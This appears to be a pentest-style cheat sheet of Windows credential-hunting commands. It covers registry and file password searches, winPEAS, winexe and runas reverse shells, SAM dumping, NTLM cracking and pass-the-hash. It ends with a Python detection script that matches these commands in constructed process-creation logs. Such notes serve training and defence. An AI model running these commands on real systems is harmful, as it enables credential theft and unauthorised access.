Search for passwords

Search the registry for passwords:

reg query HKLM /f password /t REG_SZ /s # local machine
reg query HKCU /f password /t REG_SZ /s # current user

Use winPEAS to look for credentials in common places:

.\winPEASany.exe quiet filesinfo userinfo

Use passwords

With credentials we can use winexe to spawn a shell:

winexe -U '<user>:<password>' //<target_ip> cmd.exe

# if the user is admin, we can use the system option
winexe -U '<user>:<password>' --system //<target_ip> cmd.exe

Saved creds

  1. Use winPEAS to search for stored credentials:
     .\winPEASany.exe quiet cmd windowscreds
  2. Verify with cmdkey:
     cmdkey /list
  3. Start a listener on Kali.
  4. Run the reverse shell as the user with saved credentials:
     runas /savecred /user:<user> <revshell.exe>

Configuration files

  1. Use winPEAS to search for files:
     .\winPEASany.exe quiet cmd searchfast filesinfo
     Look for files like Unattend.xml, which may contain a base64-encoded password for a user.
  2. Search manually for files with passwords:
     dir /s *pass* == *.config                # "pass" in the name, or ending with .config
     findstr /si password *.xml *.ini *.txt   # contains "password" and ends with one of these extensions
  3. winPEAS may also find SAM and SYSTEM files. Copy them to Kali.
  4. Use pwdump from the creddump7 suite to dump the hashes from the SYSTEM and SAM files:
     python2 pwdump.py <SYSTEM> <SAM>
  5. Use hashcat to crack the password:
     hashcat -m 1000 --force <second_part_of_the_hash> <wordlist>   # -m 1000 is NTLM mode; the second part of the dumped hash is the NT hash
  6. Instead of cracking the password, you can use Pass the Hash:
     pth-winexe -U '<user>%<full_hash>' //<ip> cmd.exe

     # if the user is admin, use the system option
     pth-winexe --system -U '<user>%<full_hash>' //<ip> cmd.exe
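Every discovery command in the sections above (the registry password searches, the findstr sweep, cmdkey /list, runas /savecred and the winPEAS runs) leaves its command line in process-creation telemetry, which is where a defender catches this activity. The following is an added example, not part of the original notes: a small Python hunt over constructed Sysmon Event ID 1 / Security 4688-style events. The event field names, the rule names and the sample events are assumptions made for the example.

```python
"""Hunt for the credential-discovery commands above in process-creation logs."""
import re

# Each rule maps a name to a case-insensitive pattern applied to the CommandLine
# field of a process-creation event (Sysmon ID 1 / Security 4688). Field names
# are assumed for this example; map them to your own log schema.
RULES = {
    "registry_password_search": re.compile(r"\breg(?:\.exe)?\s+query\b.*\s/f\s+password\b", re.I),
    "findstr_password_sweep": re.compile(r"\bfindstr(?:\.exe)?\b.*\bpassword\b", re.I),  # noisy on dev hosts; tune
    "cmdkey_enumeration": re.compile(r"\bcmdkey(?:\.exe)?\s+/list\b", re.I),
    "runas_savecred": re.compile(r"\brunas(?:\.exe)?\b.*\s/savecred\b", re.I),
    "winpeas_execution": re.compile(r"winpeas\w*\.exe", re.I),  # filename-based, trivially renamed
}

PROCESS_CREATE_IDS = {1, 4688}  # Sysmon EventID 1, Windows Security 4688


def hunt(events):
    """Return one finding per (event, rule) match; non-process-creation events are skipped."""
    findings = []
    for ev in events:
        if ev.get("EventID") not in PROCESS_CREATE_IDS:
            continue
        cmd = ev.get("CommandLine", "")
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append({"rule": name, "user": ev.get("User", "?"), "command": cmd})
    return findings


# Constructed sample events (not real telemetry): a mix of benign and suspicious.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CORP\\jdoe", "CommandLine": "reg  query HKLM /f password /t REG_SZ /s"},
    {"EventID": 1, "User": "NT AUTHORITY\\SYSTEM", "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"EventID": 1, "User": "CORP\\jdoe", "CommandLine": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows /v ProgramFilesDir"},
    {"EventID": 4688, "User": "CORP\\jdoe", "CommandLine": "findstr /si password *.xml *.ini *.txt"},
    {"EventID": 4688, "User": "CORP\\jdoe", "CommandLine": "cmdkey /list"},
    {"EventID": 1, "User": "CORP\\jdoe", "CommandLine": "runas /savecred /user:admin C:\\Users\\Public\\update.exe"},
    {"EventID": 1, "User": "CORP\\jdoe", "CommandLine": "C:\\Users\\jdoe\\Downloads\\winPEASany.exe quiet cmd windowscreds"},
    {"EventID": 3, "User": "CORP\\jdoe", "CommandLine": "cmdkey /list"},  # network event, wrong type: ignored
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['user']}: {f['command']}")
```

Several of these hits from one user within a few minutes is the pattern worth alerting on; any single rule in isolation will have benign matches on administrator workstations.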